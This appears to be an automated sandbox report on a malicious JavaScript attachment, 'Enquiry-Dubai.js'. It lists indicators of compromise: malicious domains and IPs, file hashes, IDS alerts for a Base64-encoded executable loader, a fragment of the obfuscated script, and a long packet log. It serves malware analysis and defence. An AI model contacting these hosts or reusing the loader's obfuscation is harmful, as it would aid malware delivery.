                                            http://r11.i.lencr.org/07 | MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmp | false |  | high
                                            https://contoso.com/License | powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            http://detarcoopmedical.com | MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                            http://ip-api.com | MSBuild.exe, 0000000A.00000002.2482251027.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            https://contoso.com/Icon | powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            https://ia600204.us.archive.org | powershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.1411249717.000001AE00001000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            http://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev | powershell.exe, 00000007.00000002.1411249717.000001AE01CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1411249717.000001AE01C98000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.1411249717.000001AE00001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                            http://mail.detarcoopmedical.com | MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                            https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                                                            IP | Domain | Country | ASN | ASN Name | Malicious
                                                                            208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
                                                                            207.241.227.224 | ia600204.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
                                                                            172.66.0.235 | pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev | United States | 13335 | CLOUDFLARENETUS | true
                                                                            161.97.124.96 | detarcoopmedical.com | United States | 51167 | CONTABODE | true
                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1646313
                                                                            Start date and time:2025-03-23 21:47:42 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 7m 22s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:14
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • GSI enabled (Javascript)
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Enquiry-Dubai.js
                                                                            Detection:MAL
                                                                            Classification:mal100.spre.troj.spyw.expl.evad.winJS@6/3@5/4
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HCA Information:
                                                                            • Successful, ratio: 95%
                                                                            • Number of executed functions: 18
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .js
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 23.204.23.20, 23.203.176.221, 199.232.214.172, 20.12.23.50, 13.85.23.206, 40.69.42.241
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, e3913.cd.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                            • Execution Graph export aborted for target powershell.exe, PID 8188 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            Time | Type | Description
                                                                            16:48:52 | API Interceptor | 44x Sleep call for process: powershell.exe modified
                                                                            16:49:04 | API Interceptor | 52x Sleep call for process: MSBuild.exe modified
                                                                                    No context
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1940658735648508
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:NlllulJnp/p:NllU
                                                                                    MD5:BC6DB77EB243BF62DC31267706650173
                                                                                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:@...e.................................X..............@..........
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    File type:ASCII text, with very long lines (307), with CRLF line terminators
                                                                                    Entropy (8bit):4.449534633378126
                                                                                    TrID:
                                                                                      File name:Enquiry-Dubai.js
                                                                                      File size:1'362'606 bytes
                                                                                      MD5:5e554206a8a10362c32d4f106ce72a98
                                                                                      SHA1:9a7ab75af22bb0ed7e0a3feb49eef5cff3d22aba
                                                                                      SHA256:61d6d15b22aed7572cca9b5785f07f02eec562a4142c2fb8605dabc89d7710b5
                                                                                      SHA512:70bb80985910c275d098ba9f18e3c98a216ce082dc30cba8172374dd5150341d523e4ce5359cf00459b5b102fe2429f3e77148a2281808232d299df25be56e3e
                                                                                      SSDEEP:384:kTTTTTTTTTFTTTTTTTTTFTTTTTTTTTFTTTTTTTTTFTTTTTTTTTTTTTTTTTTTTTTZ:mgrS
                                                                                      TLSH:5E55ED9AE32B0EA2F4CB01DB043C9C904DDE5DD5A9D33B9DEB35A0641E4486DE6B3478
                                                                                      File Content Preview:..var Kursk = ([]+[ ([]["carinately"]+[])[0] + ([]["brite"]+[])[1] + ([]["helygia"]+[])[2] + ([]["creance"]+[])[3] + ([]["osteria"]+[])[4] + ([]["iodargyrites"]+[])[5] + ([]["overcautiously"]+[])[6] + ([]["briteMap"]+[])[7] + ([]["tetrahydric"]+[])[8] +
                                                                                      Icon Hash:68d69b8bb6aa9a86


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-23T21:49:02.447982+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 207.241.227.224 | 443 | 192.168.2.4 | 49716 | TCP
2025-03-23T21:49:03.955868+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 172.66.0.235 | 443 | 192.168.2.4 | 49723 | TCP
2025-03-23T21:49:04.104187+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 172.66.0.235 | 443 | 192.168.2.4 | 49723 | TCP
2025-03-23T21:49:04.104187+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 172.66.0.235 | 443 | 192.168.2.4 | 49723 | TCP
                                                                                      • Total Packets: 731
                                                                                      • 587 undefined
                                                                                      • 443 (HTTPS)
                                                                                      • 80 (HTTP)
                                                                                      • 53 (DNS)
                                                                                      Mar 23, 2025 21:48:56.424880981 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.424920082 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.425544977 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.425587893 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.425638914 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.425651073 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.425674915 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.425714016 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.425889015 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.425928116 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.425967932 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.425978899 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.426007986 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.426044941 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.585459948 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.585489988 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.585602999 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.585623026 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.585634947 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.585691929 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.586472034 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.586494923 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.586561918 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.586568117 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.586693048 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.587174892 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.587196112 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.587268114 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.587274075 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.587327003 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.589080095 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.589102030 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.589164972 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.589171886 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.589210987 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.589772940 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.589792013 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.589854956 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.589860916 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.589915037 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.631477118 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.631499052 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.631563902 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.631573915 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.631620884 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.703505039 CET49709443192.168.2.4131.253.33.254
                                                                                      Mar 23, 2025 21:48:56.703809023 CET49709443192.168.2.4131.253.33.254
                                                                                      Mar 23, 2025 21:48:56.703847885 CET49709443192.168.2.4131.253.33.254
                                                                                      Mar 23, 2025 21:48:56.705861092 CET4968180192.168.2.42.17.190.73
                                                                                      Mar 23, 2025 21:48:56.748964071 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.749001026 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.749083042 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.749109983 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.749135017 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.749154091 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.749327898 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.749349117 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.749387026 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.749392986 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.749433041 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.749943972 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.749965906 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.750011921 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.750019073 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.750044107 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.750065088 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.751601934 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.751622915 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.751665115 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.751671076 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.751718044 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.752959967 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.752983093 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.753040075 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.753046036 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.753072023 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.753094912 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.801503897 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.802201033 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.802592039 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.802629948 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.802690029 CET49709443192.168.2.4131.253.33.254
                                                                                      Mar 23, 2025 21:48:56.803520918 CET49709443192.168.2.4131.253.33.254
                                                                                      Mar 23, 2025 21:48:56.805546045 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.805579901 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.805635929 CET49709443192.168.2.4131.253.33.254
                                                                                      Mar 23, 2025 21:48:56.813424110 CET49709443192.168.2.4131.253.33.254
                                                                                      Mar 23, 2025 21:48:56.900444031 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.909622908 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.910355091 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.910387993 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.910455942 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.910487890 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.910505056 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.910532951 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.911926985 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.911998034 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.912044048 CET49709443192.168.2.4131.253.33.254
                                                                                      Mar 23, 2025 21:48:56.912081957 CET44349709131.253.33.254192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.912117004 CET49709443192.168.2.4131.253.33.254
                                                                                      Mar 23, 2025 21:48:56.912317991 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.912339926 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.912374020 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.912379980 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.912424088 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.912797928 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.912818909 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.912869930 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.912875891 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.912903070 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.912925959 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.913857937 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.913887978 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.913960934 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.913968086 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.914028883 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.914537907 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.914563894 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.914623022 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.914628983 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.914658070 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.914686918 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:56.919310093 CET49680443192.168.2.4204.79.197.222
                                                                                      Mar 23, 2025 21:48:56.919729948 CET49719443192.168.2.4204.79.197.222
                                                                                      Mar 23, 2025 21:48:56.919755936 CET44349719204.79.197.222192.168.2.4
                                                                                      Mar 23, 2025 21:48:56.919828892 CET49719443192.168.2.4204.79.197.222
                                                                                      Mar 23, 2025 21:48:56.932383060 CET49719443192.168.2.4204.79.197.222
                                                                                      Mar 23, 2025 21:48:56.932395935 CET44349719204.79.197.222192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.071615934 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.071646929 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.071726084 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.071759939 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.071783066 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.071804047 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.073402882 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.073424101 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.073472977 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.073479891 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.073543072 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.074383974 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.074408054 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.074487925 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.074487925 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.074495077 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.074548006 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.074774981 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.074794054 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.074848890 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.074856043 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.074898958 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.075869083 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.075890064 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.075927019 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.075932980 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.075964928 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.075995922 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.077286959 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.077308893 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.077353954 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.077361107 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.077393055 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.077415943 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.124414921 CET4972080192.168.2.4142.251.40.227
                                                                                      Mar 23, 2025 21:48:57.213721037 CET8049720142.251.40.227192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.213866949 CET4972080192.168.2.4142.251.40.227
                                                                                      Mar 23, 2025 21:48:57.214001894 CET4972080192.168.2.4142.251.40.227
                                                                                      Mar 23, 2025 21:48:57.221491098 CET49680443192.168.2.4204.79.197.222
                                                                                      Mar 23, 2025 21:48:57.233397007 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.233419895 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.233488083 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.233520031 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.233546019 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.233566046 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.235074043 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.235095978 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.235167027 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.235172987 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.235224962 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:57.236095905 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:57.236116886 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.257335901 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.257368088 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.257396936 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.257432938 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.375968933 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.376013994 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.376070976 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.376099110 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.376122952 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.376180887 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.376729012 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.376789093 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.376815081 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.376830101 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.376858950 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.376879930 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.378691912 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.378736973 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.378784895 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.378798962 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.378825903 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.379031897 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:58.379050970 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:58.379096031 CET44349716207.241.227.224192.168.2.4
